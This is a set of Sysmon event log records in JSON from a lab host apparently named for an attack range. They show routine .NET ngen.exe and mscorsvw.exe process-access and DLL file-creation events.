{"EventTime":"2020-08-01 08:04:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6702,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:05.632\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F5-5F25-0000-0010B4870A00}\r\nTargetProcessId: 3456\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:05.632","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F5-5F25-0000-0010B4870A00}","TargetProcessId":"3456","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6703,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:05.632\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F5-5F25-0000-0010B4870A00}\r\nTargetProcessId: 3456\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:05.632","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F5-5F25-0000-0010B4870A00}","TargetProcessId":"3456","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6704,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:05.648\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F5-5F25-0000-0010B4870A00}\r\nTargetProcessId: 3456\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:05.648","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F5-5F25-0000-0010B4870A00}","TargetProcessId":"3456","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6705,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:05.742\r\nProcessGuid: {41C8662E-21F5-5F25-0000-0010B4870A00}\r\nProcessId: 3456\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d80-0\\CustomMarshalers.dll\r\nCreationUtcTime: 2020-08-01 08:04:05.742","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:05.742","ProcessGuid":"{41C8662E-21F5-5F25-0000-0010B4870A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d80-0\\CustomMarshalers.dll","CreationUtcTime":"2020-08-01 08:04:05.742","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6706,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:05.773\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F5-5F25-0000-0010E08A0A00}\r\nTargetProcessId: 4316\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:05.773","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F5-5F25-0000-0010E08A0A00}","TargetProcessId":"4316","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6707,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:05.773\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F5-5F25-0000-0010E08A0A00}\r\nTargetProcessId: 4316\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:05.773","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F5-5F25-0000-0010E08A0A00}","TargetProcessId":"4316","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6708,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:05.773\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F5-5F25-0000-0010E08A0A00}\r\nTargetProcessId: 4316\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:05.773","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F5-5F25-0000-0010E08A0A00}","TargetProcessId":"4316","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6709,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:05.851\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F5-5F25-0000-00105A8E0A00}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:05.851","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F5-5F25-0000-00105A8E0A00}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6710,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:05.851\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F5-5F25-0000-00105A8E0A00}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:05.851","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F5-5F25-0000-00105A8E0A00}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
